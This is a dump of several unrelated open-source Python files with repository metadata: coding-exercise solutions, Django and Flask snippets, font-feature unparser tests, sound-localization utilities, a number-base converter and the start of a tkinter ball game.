] | permissive | HBinhCT/Q-project | 0f80cd15c9945c43e2e17072416ddb6e4745e7fa | 19923cbaa3c83c670527899ece5c3ad31bcebe65 | refs/heads/master | 2023-08-30T08:59:16.006567 | 2023-08-29T15:30:21 | 2023-08-29T15:30:21 | 247,630,603 | 8 | 1 | MIT | 2020-07-22T01:20:23 | 2020-03-16T06:48:02 | Python | UTF-8 | Python | false | false | 875 | py | """
# Sample code to perform I/O:
name = input() # Reading input from STDIN
print('Hi, %s.' % name) # Writing output to STDOUT
# Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail
"""
# Write your code here
from collections import defaultdict
t = int(input())
for _ in range(t):
l = input().strip()
count_a = count_b = count_c = 0
delta_patterns = defaultdict(int)
delta_patterns[(0, 0)] = 1
for c in l:
if c == 'a':
count_a += 1
elif c == 'b':
count_b += 1
elif c == 'c':
count_c += 1
combine = (count_a - count_b, count_a - count_c)
delta_patterns[combine] += 1
result = 0
for count in delta_patterns.values():
if count > 1:
result += (count - 1) * count // 2
print(result)
| [
"hbinhct@gmail.com"
] | hbinhct@gmail.com |
1c81f2b5373941ff4b3cacc4269d00c333b9dfab | 09aee268ce72d282f53fe94f42478e2b3b48127d | /PracticemodelformProject/testapp/admin.py | 204fdaf32620f4860c87848b9f5ccbbb2094de3c | [] | no_license | keshava519/Django_Projects | c95d0f8c55d4cc946291be6fb058b7298aefe596 | 99584892b9d9ec6b6395a382c684b4d036d07874 | refs/heads/main | 2023-02-23T03:44:32.110742 | 2021-01-27T15:15:13 | 2021-01-27T15:15:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 213 | py | from django.contrib import admin
from testapp.models import Student
# Register your models here.
class StudentAdmin(admin.ModelAdmin):
list_display=['name','marks']
admin.site.register(Student,StudentAdmin)
| [
"keshava.cadcam@gmail.com"
] | keshava.cadcam@gmail.com |
53410072ce6d7e6b0748d3be7521fbceb1cb762d | 0bdfefad123a03754713c64582a3986bd26965bd | /tests/test_user.py | 5f947fd39d6c494f18bedaa1ea4c80ede89935a6 | [] | no_license | Kennedy128/pitch-survey | 889d7747139b88df76bfb09d8801d83cf05063b7 | f6c0cb8ab8a57ba4b59b53a8a6092d0c023dc8e5 | refs/heads/master | 2022-05-29T07:46:54.391714 | 2020-05-05T23:05:00 | 2020-05-05T23:05:00 | 260,503,908 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,175 | py | import unittest
from app.models import User
from app import db
class UserModelTest(unittest.TestCase):
    """Unit tests for the User model: persistence, password hashing, attributes."""
    def setUp(self):
        # Fresh fixture user before every test.
        self.new_user = User(username = "kennedy", email ="kennedymbithi12@gmail.com", bio = "I am incredible", profile_pic_url = "image_url", password = 'kenny', id = 1 )
    def tearDown(self):
        # Delete all users so tests stay independent of each other.
        User.query.delete()
    def test_save_user(self):
        self.new_user.save_user()
        self.assertTrue(len(User.query.all())>0)
    def test_password_setter(self):
        # Setting a password should populate the hashed pass_secure field.
        self.assertTrue(self.new_user.pass_secure is not None)
    def test_no_access_password(self):
        # Reading the plaintext password attribute is expected to be forbidden.
        with self.assertRaises(AttributeError):
            self.new_user.password
    def test_password_verification(self):
        # NOTE(review): the fixture password is 'kenny' but this verifies
        # 'Kennedy'; unless verify_password is case/variant-insensitive this
        # assertion fails — TODO confirm.
        self.assertTrue(self.new_user.verify_password('Kennedy'))
    def test_check_instance_variables(self):
        # NOTE(review): assertEquals is a deprecated alias of assertEqual.
        self.assertEquals(self.new_user.username, 'kennedy')
        self.assertEquals(self.new_user.email, 'kennedymbithi12@gmail.com')
        self.assertEquals(self.new_user.bio, 'I am incredible')
        self.assertEquals(self.new_user.profile_pic_url, 'image_url')
self.assertEquals(self.new_user.password,'kenny' ) | [
"santa@northpole.com"
] | santa@northpole.com |
b5d963da42ff8506f0eeb54936e68ed7926e4e90 | 6923f79f1eaaba0ab28b25337ba6cb56be97d32d | /BuildingMachineLearningSystemsWithPython/ch01/gen_webstats.py | fa133d769a16dc477cbbb22ac4d2ba34f9a13a27 | [] | no_license | burakbayramli/books | 9fe7ba0cabf06e113eb125d62fe16d4946f4a4f0 | 5e9a0e03aa7ddf5e5ddf89943ccc68d94b539e95 | refs/heads/master | 2023-08-17T05:31:08.885134 | 2023-08-14T10:05:37 | 2023-08-14T10:05:37 | 72,460,321 | 223 | 174 | null | 2022-10-24T12:15:06 | 2016-10-31T17:24:00 | Jupyter Notebook | UTF-8 | Python | false | false | 1,289 | py | # This code is supporting material for the book
# Building Machine Learning Systems with Python
# by Willi Richert and Luis Pedro Coelho
# published by PACKT Publishing
#
# It is made available under the MIT License
# This script generates web traffic data for our hypothetical
# web startup "MLASS" in chapter 01
import os
import scipy as sp
from scipy.stats import gamma
import matplotlib.pyplot as plt
from utils import DATA_DIR, CHART_DIR
# Fixed seed so the synthetic data set can be regenerated identically later.
sp.random.seed(3)

# One sample per hour for 31 days.
hours = sp.arange(1, 31 * 24)
# Weekly sinusoid baseline + gamma-distributed noise + slow exponential growth.
hits = sp.array(200 * (sp.sin(2 * sp.pi * hours / (7 * 24))), dtype=int)
hits += gamma.rvs(15, loc=0, scale=100, size=len(hours))
hits += 2 * sp.exp(hours / 100.0)
# Mask out negative values produced by the sinusoid.
hits = sp.ma.array(hits, mask=[hits < 0])
print(sum(hits), sum(hits < 0))

plt.scatter(hours, hits)
plt.title("Web traffic over the last month")
plt.xlabel("Time")
plt.ylabel("Hits/hour")
week_starts = [w * 7 * 24 for w in [0, 1, 2, 3, 4]]
week_labels = ['week %i' % (w + 1) for w in [0, 1, 2, 3, 4]]
plt.xticks(week_starts, week_labels)
plt.autoscale(tight=True)
plt.grid()
plt.savefig(os.path.join(CHART_DIR, "1400_01_01.png"))

# Alternative export of only the unmasked samples:
# sp.savetxt(os.path.join("..", "web_traffic.tsv"),
#            zip(hours[~hits.mask], hits[~hits.mask]), delimiter="\t", fmt="%i")
sp.savetxt(os.path.join(
    DATA_DIR, "web_traffic.tsv"), list(zip(hours, hits)), delimiter="\t", fmt="%s")
| [
"bb@b.om"
] | bb@b.om |
19bc27f2d36f6218270c1f5123559fb259030256 | c924753b19bc892f9b756483f080cd8a69f22dec | /tests/test_unparse_sub.py | 314d51de3b294148efc0fee5782aec2767c3f5e2 | [
"BSD-3-Clause"
] | permissive | mbrukman/fontFeatures | 21a65190aea163174486d026627b7a87a2e3fa20 | 9c33517571d9870e536dea005f7387f52b3fc967 | refs/heads/master | 2023-03-07T02:41:37.527028 | 2021-02-16T22:45:47 | 2021-02-16T22:45:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,808 | py | from fontFeatures import Substitution, FontFeatures
from fontTools.ttLib import TTFont
from fontFeatures.ttLib.GSUBUnparser import GSUBUnparser
from fontFeatures.ttLib import unparseLanguageSystems
import pprint
import unittest
class TestUnparse(unittest.TestCase):
    """Checks GSUB lookup unparsing against known rules from Amiri-Regular."""
    # Shared fixtures, built once when the class body is executed.
    font = TTFont("fonts/Amiri-Regular.ttf")
    lookups = font["GSUB"].table.LookupList.Lookup
    ff = FontFeatures()
    unparser = GSUBUnparser(font["GSUB"], ff, [])
    def test_single(self):
        g, _ = self.unparser.unparseLookup(self.lookups[1], 1) # part of locl
        self.assertEqual(g.rules[0].asFea(), "sub period by period.ara;")
        self.assertEqual(g.rules[1].asFea(), "sub guillemotleft by guillemotleft.ara;")
    def test_ligature(self):
        g, _ = self.unparser.unparseLookup(self.lookups[0], 0) # part of ccmp
        self.assertEqual(g.rules[0].asFea(), "sub uni0627 uni065F by uni0673;")
    def test_multiple(self):
        g, _ = self.unparser.unparseLookup(self.lookups[10], 10)
        self.assertEqual(g.rules[0].asFea(), "sub uni08B6 by uni0628 smallmeem.above;")
    def test_ignore(self):
        g, _ = self.unparser.unparseLookup(self.lookups[48], 48)
        self.assertEqual(
            g.rules[0].asFea(),
            "ignore sub [uni0622 uni0627 uni0648 uni0671 uni0627.fina uni0671.fina] uni0644.init' uni0644.medi' [uni0647.fina uni06C1.fina];",
        )
    def test_chaining(self):
        # Chaining lookups reference other lookups, so all must be unparsed first.
        self.unparser.unparseLookups()
        g, _ = self.unparser.unparseLookup(
            self.lookups[33], 33
        )  # part of calt in quran.fea
        self.unparser.resolve_routine(g)
        self.assertEqual(
            g.rules[0].asFea(),
            "sub uni0644' lookup SingleSubstitution32 uni0621' lookup SingleSubstitution31 uni0627' lookup SingleSubstitution32;",
        )
| [
"simon@simon-cozens.org"
] | simon@simon-cozens.org |
3595f3dc264996d3f27dba5091335b3d7999d3c1 | 70fccf84f1f8dbca2d289e4c983a45b6d715f5df | /utils/prob.py | 912341c94261659e690a170ee4c042f344caaa69 | [] | no_license | SensorsAudioINI/SpikeSeparation | ca05b4e08e90127bf82226ebc4ba6d7a0618ec94 | 6807b0914d90f6ae66e550be9ad50483b9c3d983 | refs/heads/master | 2021-03-30T17:47:27.209746 | 2020-04-03T14:42:46 | 2020-04-03T14:42:46 | 122,992,649 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,844 | py | from __future__ import division
from scipy.stats import norm
import warnings
import numpy as np
import progressbar
from matplotlib import pyplot
# Candidate locations as (index, angle) pairs; consumed by
# get_transition_probabilities, which reads column 1 as the angle.
index_angles_01 = np.array([[12, 0], [11, -30], [9, -90], [8, -60], [4, 60], [3, 90], [1, 30]])
index_angles_02 = np.array([[1, 30], [2, 60], [3, 90], [4, 120], [5, 150], [6, 180], [7, 210], [8, 240], [9, 270],
                            [10, 300], [11, 330], [12, 0]])
def get_estimates(itds, initial_estimate, transition_probabilities, itd_dict, prior, save_to_file=None, verbose=False):
    """Implements the basic probabilistic model.
    Args:
        :param itds: The itds as a numpy array, of dtype np.float32, in seconds.
        :param initial_estimate: The initial estimate as numpy array of size num_possible_locations. Note that the array
        should be a valid probability distribution, so should sum upto 1.
        :param transition_probabilities: The transition probabilities, as a numpy 2D array. Again, the rows must be
        valid probability distributions.
        :param itd_dict: The itd mapping between the quantized itds and their indices in array format.
        :param prior: The prior distributions, as numpy 2D array, rows should be valid probability distributions.
        :param save_to_file: If not None, filename is expected, to which the estimates and argmax_estimates are saved.
        :param verbose: If True, then a progressbar display of the progress will be displayed.
    Returns:
        :return: A tuple (estimates, argmax_estimates)
        estimates: A numpy 2D array, with the probability estimates at every itd.
        argmax_estimates: A numpy array, with the argmax of the probability estimate at every itd.
    """
    localization_estimate = initial_estimate
    num_itds = len(itds)
    estimates = np.zeros(shape=(num_itds, prior.shape[0]), dtype=np.float32)
    argmax_estimates = np.zeros(shape=num_itds, dtype=np.int32)
    bar = progressbar.ProgressBar() if verbose else identity
    for itd_idx, itd in bar(enumerate(itds)):
        # Prediction: propagate the previous estimate through the transition model.
        position_matrix = np.multiply(transition_probabilities, localization_estimate)
        position_probability = np.sum(position_matrix, axis=1)
        # Likelihood of the observed ITD at every location (nearest quantized bin).
        # The bin index does not depend on the location, so compute it once.
        bin_idx = np.argmin(np.abs(itd_dict - itd))
        motion_probability = prior[:, bin_idx]
        probability_to_normalize = np.multiply(motion_probability, position_probability)
        localization_estimate = probability_to_normalize / sum(probability_to_normalize)
        estimates[itd_idx] = localization_estimate
        argmax_estimates[itd_idx] = np.argmax(localization_estimate)
        if np.isnan(np.sum(localization_estimate)):
            warnings.warn('Something wrong with the estimate.')
    if save_to_file is not None:
        np.savez(save_to_file, estimates=estimates, argmax_estimates=argmax_estimates)
    # np.float was an alias of the builtin float and was removed in NumPy 1.24;
    # use float directly (same float64 result).
    return np.array(estimates, dtype=np.float32), np.array(argmax_estimates, dtype=float)
def get_priors(itd_streams, max_itd=800e-6, num_bins=80, save_to_file=None):
    """Estimate per-location ITD prior distributions from separated streams.
    Args:
        :param itd_streams: One ITD stream per discrete location.
        :param max_itd: Histogram half-range in seconds; bins cover [-max_itd, max_itd].
        :param num_bins: Number of quantization bins.
        :param save_to_file: If not None, filename to which the priors are saved.
    Returns:
        :return: 2D float32 array of shape (num_locations, num_bins); each row
            is the normalized histogram of the corresponding stream.
    """
    priors = np.zeros(shape=(len(itd_streams), num_bins), dtype=np.float32)
    for row, stream in enumerate(itd_streams):
        counts, _ = np.histogram(stream, bins=num_bins, range=(-max_itd, max_itd))
        priors[row] = counts / len(stream)
    if save_to_file is not None:
        np.save(save_to_file, priors)
    return priors
def get_transition_probabilities(index_angles=index_angles_01, sigma=5):
    """Build Gaussian transition probabilities between the discrete locations.
    Args:
        :param index_angles: Array of (location index, angle) pairs.
        :param sigma: Standard deviation of each Gaussian.
    Returns:
        :return: A numpy 2D float32 array; row i holds the Gaussian density
            centred on location i's angle, evaluated at every location's angle
            (in the original row order of index_angles).
    """
    num_locations = len(index_angles)
    transition_probabilities = np.zeros(shape=(num_locations, num_locations), dtype=np.float32)
    original_order = index_angles[:, 1]
    sorted_angles = np.sort(original_order)
    for row, location in enumerate(index_angles):
        densities = norm(location[1], sigma).pdf(sorted_angles)
        density_by_angle = dict(zip(sorted_angles, densities))
        transition_probabilities[row] = [density_by_angle[angle] for angle in original_order]
    return transition_probabilities
def moving_average(estimates, window_length=10):
    """Smooth the estimates with a forward-looking moving window.
    Args:
        :param estimates: Numpy array of estimates, one entry per time step.
        :param window_length: Number of consecutive estimates averaged together.
    Returns:
        :return: Array of the same shape; entry i holds the mean of
            estimates[i:i + window_length], and the trailing entries repeat
            the last full-window average.
    """
    smoothed = np.zeros_like(estimates)
    last_full_start = len(estimates) - window_length
    for start in range(last_full_start + 1):
        smoothed[start] = np.mean(estimates[start:start + window_length], axis=0)
    for start in range(last_full_start + 1, len(estimates)):
        smoothed[start] = smoothed[last_full_start]
    return smoothed
def identity(x):
    # No-op passthrough; stands in for the progress-bar wrapper when verbose is False.
    return x
def get_kalman_estimates(itds, h_k=-178., r_k=210. ** 2, f_k=1., q_k=(0.05) ** 2,
                         init_state=np.array(0), init_var_state=np.array(0) ** 2,
                         version='basic', itd_shift=37.20):
    """Track the source state with a scalar Kalman filter over the ITD stream.
    Args:
        :param itds: ITDs in seconds (scaled to microseconds internally).
        :param h_k: Observation factor mapping state to ITD (microseconds).
        :param r_k: Observation noise variance.
        :param f_k: State transition factor.
        :param q_k: Process noise variance.
        :param init_state: Initial state estimate (read-only; the shared array
            default is never mutated, so it is safe).
        :param init_var_state: Initial state variance.
        :param version: Unused; kept only for backward compatibility of the signature.
        :param itd_shift: Constant offset (in microseconds) added to the ITDs.
    Returns:
        :return: Tuple (estimates, variances) as numpy arrays, one entry per ITD.
    """
    itds = itds * 1e6 + itd_shift
    estimates, variances = [], []
    x_k_k = init_state
    p_k_k = init_var_state
    for itd in itds:
        # Predict step.
        x_k_km = f_k * x_k_k
        p_k_km = f_k * p_k_k * f_k + q_k
        # Update step: innovation y_k, innovation variance s_k, Kalman gain k_k.
        y_k = itd - h_k * x_k_km
        s_k = r_k + h_k * p_k_km * h_k
        k_k = p_k_km * h_k / s_k
        x_k_k = x_k_km + k_k * y_k
        p_k_k = p_k_km - k_k * h_k * p_k_km
        # (The original also computed a post-fit residual y_k_k here but never
        # used it; the dead statement has been removed.)
        estimates.append(x_k_k)
        variances.append(p_k_k)
    return np.array(estimates), np.array(variances)
if __name__ == '__main__':
    # Quick visual sanity check of the transition matrix; not an automated test.
    test_index_angles = np.array([[12, 0], [11, -30], [9, -90], [8, -60], [4, 60], [3, 90], [1, 30]])
    test_transition_probabilities = get_transition_probabilities(test_index_angles, sigma=5)
    pyplot.imshow(test_transition_probabilities, aspect='auto', interpolation='nearest')
    pyplot.show()
    print('Hello world, nothing to test for now.')
| [
"enea.ceolini@gmail.com"
] | enea.ceolini@gmail.com |
8a76865e6a5cdbbe7fa9df6795eea725d172e6c9 | 1bbead5d97a279383ae9ae6e4ee70af5d69f1e92 | /tokipona1000/init_conll.py | e9dc534168a128e9f2bcd38130063f4255f8815c | [] | no_license | m-rey/tokipona-corpus-collection | de948540b5045477418b88b0fc9594794cb5f921 | fd8988273f6dfbdad4aaffc12447d0e63284e5d0 | refs/heads/main | 2023-09-05T01:33:39.482149 | 2021-11-20T17:55:34 | 2021-11-20T17:55:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 551 | py | from ilonimi.normalizer import Normalizer
from ilonimi.tokenizer import Tokenizer
def main():
    """Dump tokipona1000.txt as numbered, minimal CoNLL-style token blocks."""
    normalizer = Normalizer()
    tokenizer = Tokenizer()
    with open('tokipona1000.txt') as source:
        for index, raw_line in enumerate(source):
            sentence = tokenizer(normalizer(raw_line.strip()))
            # Sentence header, then one line per token with placeholder fields.
            print('# {}: {}'.format(index + 1, sentence))
            for position, token in enumerate(sentence.split()):
                print('{} {} {} {} {}'.format(position + 1, token, 'X', '0', 'x'))
            print('')
if __name__ == '__main__':
    # main() is intentionally disabled; running this module does nothing.
    #main()
    pass
| [
"nymwa0@gmail.com"
] | nymwa0@gmail.com |
acc4b47ecab5e6f2765e24d3ccdf1f6b96e4655a | a797793842f433251d2ab0bafb0ebe800b89a076 | /rulet.py | 8d79359d829dea8fd95428ecdf71213eb4e4120b | [] | no_license | irhadSaric/Instrukcije | b2f576bceb7e75f5fa65bfef99c9cde53d597b32 | 9ac8979b824babdeef3712ab9d23c764536d57b0 | refs/heads/master | 2020-09-28T09:00:08.389651 | 2020-02-01T20:33:59 | 2020-02-01T20:33:59 | 226,740,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | import random
# I want to play roulette 10000 times.
# Each of those 10000 times I will pick a random number on the wheel.
# What is the probability that I win?
# Highest number on the wheel: 36
brojiPobjede = 0
for i in range(10000):
    mojBroj = random.randint(0, 36)
    ruletovBroj = random.randint(0, 36)
    if mojBroj == ruletovBroj:
        brojiPobjede += 1
# Empirical win probability over the 10000 simulated spins.
print(brojiPobjede / 10000)
"irhad.saric@hotmail.com"
] | irhad.saric@hotmail.com |
7500539e4b77c87262170eb516cec1aceeee07e0 | f00ad57c98e554470a72511dda7a7bfd160aca19 | /linear_structure/stack/number_converter.py | c3c80bda42a7c14c042346c0ebb05009899d9057 | [] | no_license | fanzhangg/algorithm-problems | d60115210aaaffcd094b34b9db5b46dadf93fe9e | 43b111ad625f197ba0905abceab9ee4484284e08 | refs/heads/master | 2021-07-12T20:24:46.265700 | 2020-07-06T17:58:31 | 2020-07-06T17:58:31 | 171,220,135 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,684 | py | from stack import Stack
def dec_to_bin(num: int) -> str:
    """
    Convert a non-negative integer into its binary string.
    Algorithm: Divided By 2
    - Continuously divide the number by 2, pushing each remainder on a stack
    - Popping the stack yields the remainders in reverse order, which is the
      binary string
    i.e. The binary string of 233 is 11101001
    1 | 233
    0 | 116
    0 | 58
    1 | 29
    0 | 14
    1 | 7
    1 | 3
    1 | 1
        0
    :param num: a non-negative integer
    :return: the binary string, e.g. "11101001"
    :raises ValueError: if num is negative (floor division by 2 would never
        reach 0, so the loop below would not terminate)
    """
    if num < 0:
        raise ValueError("num must be a non-negative integer")
    if num == 0:
        return "0"  # previously the loop was skipped and "" was returned
    stack = Stack()
    while num != 0:
        stack.push(num % 2)
        num = num // 2
    # Pop in LIFO order to reverse the remainders; join once at the end
    # instead of rebuilding the string on every iteration.
    digits = []
    while not stack.isempty():
        digits.append(str(stack.pop()))
    return "".join(digits)
def dec_to_hex(num: int) -> str:
    """
    Convert a non-negative decimal integer to a hexadecimal string
    :param num: a non-negative integer
    :return: a hexadecimal string (A for 10, B for 11, ...), e.g. "100" for 256
    :raises ValueError: if num is negative
    """
    if num < 0:
        raise ValueError("num must be a non-negative integer")
    if num == 0:
        return "0"  # previously the loop was skipped and "" was returned
    digits = "0123456789ABCDEF"
    stack = Stack()
    while num != 0:
        stack.push(num % 16)
        num = num // 16
    # Pop in LIFO order and map each remainder to its hex digit.
    out = []
    while not stack.isempty():
        out.append(digits[stack.pop()])
    return "".join(out)
def dec_to_oct(num: int) -> str:
    """
    Convert a non-negative decimal integer to an octal string
    :param num: a non-negative integer
    :return: the octal string, e.g. "31" for 25
    :raises ValueError: if num is negative
    """
    if num < 0:
        raise ValueError("num must be a non-negative integer")
    if num == 0:
        return "0"  # previously the loop was skipped and "" was returned
    stack = Stack()
    while num != 0:
        stack.push(num % 8)
        num = num // 8
    # Pop in LIFO order to reverse the remainders.
    out = []
    while not stack.isempty():
        out.append(str(stack.pop()))
    return "".join(out)
if __name__ == "__main__":
print(dec_to_oct(25))
print(dec_to_hex(256))
| [
"vanadiumzhang@gmail.com"
] | vanadiumzhang@gmail.com |
5c09566cc272f32a6131fcd7db6e831101f055f0 | add74ecbd87c711f1e10898f87ffd31bb39cc5d6 | /xcp2k/classes/_print13.py | a7e6fa4811794eca39b339bb74efedcf02cf7cbe | [] | no_license | superstar54/xcp2k | 82071e29613ccf58fc14e684154bb9392d00458b | e8afae2ccb4b777ddd3731fe99f451b56d416a83 | refs/heads/master | 2021-11-11T21:17:30.292500 | 2021-11-06T06:31:20 | 2021-11-06T06:31:20 | 62,589,715 | 8 | 2 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | from xcp2k.inputsection import InputSection
from xcp2k.classes._program_run_info9 import _program_run_info9
from xcp2k.classes._temperature_colvar1 import _temperature_colvar1
from xcp2k.classes._colvar1 import _colvar1
from xcp2k.classes._hills1 import _hills1
class _print13(InputSection):
    """Auto-generated wrapper for a CP2K ``PRINT`` input section."""
    def __init__(self):
        InputSection.__init__(self)
        # Child sections exposed as attributes; _subsections maps the
        # attribute names to the CP2K keyword names.
        self.PROGRAM_RUN_INFO = _program_run_info9()
        self.TEMPERATURE_COLVAR = _temperature_colvar1()
        self.COLVAR = _colvar1()
        self.HILLS = _hills1()
        self._name = "PRINT"
        self._subsections = {'PROGRAM_RUN_INFO': 'PROGRAM_RUN_INFO', 'TEMPERATURE_COLVAR': 'TEMPERATURE_COLVAR', 'COLVAR': 'COLVAR', 'HILLS': 'HILLS'}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
7bf3cd6349e900045b70d5067d841f9c263f9e28 | 318013ccb8738ace0ec72965dac0a3e3fe2fecad | /venv/bin/rst2man.py | 349d495c52f4ce4e924826a8e3e02475f3a96e78 | [] | no_license | nahyunkwon/Processing-3DImages | 792deafbd1a607af8cae439b5d7ab81f772f6653 | bde217aad08dd911ae8125edeae42f7b674614f2 | refs/heads/master | 2023-01-02T10:29:41.325974 | 2020-11-01T19:02:19 | 2020-11-01T19:02:19 | 299,133,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | #!/Users/kwon/PycharmProjects/3D_A2I/venv/bin/python
# Author:
# Contact: grubert@users.sf.net
# Copyright: This module has been placed in the public domain.
"""
man.py
======
This module provides a simple command line interface that uses the
man page writer to output from ReStructuredText source.
"""
import locale
try:
    # Best effort: adopt the user's default locale for message formatting.
    locale.setlocale(locale.LC_ALL, '')
except locale.Error:
    # Narrowed from a bare `except:` (PEP 8 E722): setlocale raises
    # locale.Error for unsupported/undefined locales; fall back to the
    # default "C" locale in that case instead of swallowing everything.
    pass

from docutils.core import publish_cmdline, default_description
from docutils.writers import manpage

description = ("Generates plain unix manual documents. " + default_description)

# Run the docutils command-line front end with the man-page writer.
publish_cmdline(writer=manpage.Writer(), description=description)
| [
"skgus2624@gmail.com"
] | skgus2624@gmail.com |
ab48adc1e062d9080c5cb2145e3c5b78a51ebdd6 | f6078890ba792d5734d289d7a0b1d429d945a03a | /mid-term/chapmanbrendan/chapmanbrendan_26691_1312276_Q3.py | 299fe01f6c53025391c5faf4bf7e5800e3c4c29f | [] | no_license | huazhige/EART119_Lab | 1c3d0b986a0f59727ee4ce11ded1bc7a87f5b7c0 | 47931d6f6a2c7bc053cd15cef662eb2f2027712c | refs/heads/master | 2020-05-04T23:40:53.709217 | 2019-06-11T18:30:45 | 2019-06-11T18:30:45 | 179,552,067 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,818 | py | # -*- coding: utf-8 -*-
"""
Created on Wed May 8 08:24:43 2019
@author: blchapma
"""
#============================================================================
"Packages"
#============================================================================
import numpy as np
import matplotlib.pyplot as plt
#============================================================================
"Variables"
#============================================================================
# Load the two-column data file and split into time (a_t) and height (a_y).
# NOTE(review): the Windows path uses unescaped backslashes; they happen not
# to form escape sequences here, but a raw string r'...' would be safer.
mData = np.loadtxt('E:\EAR119\Python Scripts\midterm_dydx.txt').T
a_t, a_y = mData[0], mData[1]
#===================================================================================
# derivatives
#===================================================================================
# Sample count and time step (assumes uniform sampling — TODO confirm).
N = len( a_t)
dt = a_t[1]-a_t[0]
# Central differences for velocity and acceleration (vectorized).
a_vel = (a_y[2::] - a_y[0:-2])/(2*dt)
a_acc = (a_y[2::] - 2*a_y[1:-1] + a_y[0:-2])/(dt**2)
# add zeros at beginning and end for plotting purposes
a_vel = np.hstack( (0,a_vel, 0))
a_acc = np.hstack( (0,a_acc, 0))
# Element-by-element recomputation of the same central differences.
for i in range( 1, N-1):
    a_vel[i] = ( a_y[i+1] - a_y[i-1])/(2*dt)
    a_acc[i] = ( a_y[i+1] - 2*a_y[i] + a_y[i-1])/(dt**2)
# NOTE(review): this is a for/else; with no `break` above, the else branch
# always runs after the loop, so it does not choose between the two solutions.
else: # vectorized solution
    # NOTE(review): y is rebound to the integer 0, so the y[i] indexing below
    # raises TypeError; presumably a_y was intended — TODO confirm.
    y = 0
    # From Week 2:
    i = 1
    # NOTE(review): largest_height stays unbound if this loop body never runs.
    while y[i] > y[i-1]:
        largest_height = y[i]
        i += 1
#===================================================================================
# plots
#===================================================================================
# Time of the detected peak (index i left over from the search loop above).
t_maxHeight = a_t[i]
# NOTE(review): Python 2 print statement — a SyntaxError under Python 3.
print "The largest height achieved was %f m" % (largest_height), ' at t =', t_maxHeight
# We might also like to plot the path again just to compare
# Three stacked panels: height, velocity and acceleration versus time.
plt.figure()
plt.subplot( 311)
plt.plot( a_t, a_y)
# Mark the sample at the detected peak time.
plt.plot( [t_maxHeight], a_y[a_t == t_maxHeight], 'r*')
plt.ylabel('Height (m)')
plt.grid( True)
plt.subplot( 312)
# skip zeros and beginning and end
plt.plot( a_t[1:-1], a_vel[1:-1])
# peak height at v = 0
plt.plot( [t_maxHeight], a_vel[a_t == t_maxHeight], 'r*')
plt.ylabel('Velocity (m/s)')
plt.grid( True)
plt.subplot( 313)
# skip zeros and beginning and end
plt.plot( a_t[1:-1], a_acc[1:-1])
plt.xlabel('Time (s)')
plt.ylabel('Acceleration (m/s2)')
# NOTE(review): g is never defined in this script — NameError at runtime.
plt.ylim( -g - 5, -g+5)
plt.grid( True)
plt.show()
#============================================================================
"Image"
#============================================================================
plt.savefig("Q1", dpi=None, facecolor='w', edgecolor='w',
orientation='portrait', papertype=None, format="PNG",
transparent=False, bbox_inches=None, pad_inches=0.1,
frameon=None, metadata=None)
plt.show()
#============================================================================ | [
"hge2@ucsc.edu"
] | hge2@ucsc.edu |
1b84faef65cc22245c96450dcbadae2ec6e81808 | 05725c7af76fd87d94cf424ef7d66efa50ac0bae | /mysite/exam/migrations/0008_auto_20200529_0948.py | 0d2407fdaef56b2c25e7ab300a64fb37490869b2 | [] | no_license | zhuzemin/questionnaire | 759ff2a9f14062f4cc03782269e8c17222a5b778 | 473a17bb0eb6fadeef0884df61d456d8bbb43259 | refs/heads/master | 2022-11-07T08:32:42.741511 | 2020-07-01T07:04:24 | 2020-07-01T07:04:24 | 276,302,646 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 757 | py | # Generated by Django 3.0.6 on 2020-05-29 01:48
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Adds nullable startTime/finishTime to Exam; logtime now defaults to now()."""
    dependencies = [
        ('exam', '0007_exam_status'),
    ]
    operations = [
        # New optional timestamp recording when the exam was finished.
        migrations.AddField(
            model_name='exam',
            name='finishTime',
            field=models.DateTimeField(blank=True, null=True),
        ),
        # New optional timestamp recording when the exam was started.
        migrations.AddField(
            model_name='exam',
            name='startTime',
            field=models.DateTimeField(blank=True, null=True),
        ),
        # logtime now defaults to the current time on creation.
        migrations.AlterField(
            model_name='exam',
            name='logtime',
            field=models.DateTimeField(default=django.utils.timezone.now),
        ),
    ]
| [
"gogs@fake.local"
] | gogs@fake.local |
ac5ba21305a500a9b7671ef57166bd48d55276cc | 93e5b82332af9f0d3e203d086e30794fb90a2086 | /ForKids/appendixb/ch14-game-over.py | 474538652bae3b7192201c20d918b5c516da7d26 | [] | no_license | swell1009/ex | cfaae0b5fe917f12416170dce60f7dea8194f368 | 29b274fb51adbdc43af6ebecaec89c97bc58be6f | refs/heads/master | 2020-04-04T10:15:20.578932 | 2018-11-22T06:27:30 | 2018-11-22T06:27:30 | 155,848,187 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,701 | py | from tkinter import *
import random
import time
class Ball:
    """The bouncing ball: moves every frame and reacts to walls and the paddle."""

    def __init__(self, canvas, paddle, color):
        self.canvas = canvas
        self.paddle = paddle
        self.id = canvas.create_oval(10, 10, 25, 25, fill=color)
        self.canvas.move(self.id, 245, 100)
        # Random initial horizontal speed; vertical speed always starts upward.
        speeds = [-3, -2, -1, 1, 2, 3]
        random.shuffle(speeds)
        self.x = speeds[0]
        self.y = -3
        self.canvas_width = self.canvas.winfo_width()
        self.canvas_height = self.canvas.winfo_height()
        self.hit_bottom = False

    def hit_paddle(self, pos):
        """Return True when the ball's bounding box touches the paddle."""
        left, top, right, bottom = self.canvas.coords(self.paddle.id)
        overlaps_x = pos[2] >= left and pos[0] <= right
        overlaps_y = top <= pos[3] <= bottom
        return overlaps_x and overlaps_y

    def draw(self):
        """Advance one frame and bounce off walls and the paddle."""
        self.canvas.move(self.id, self.x, self.y)
        pos = self.canvas.coords(self.id)
        if pos[1] <= 0:
            self.y = 3
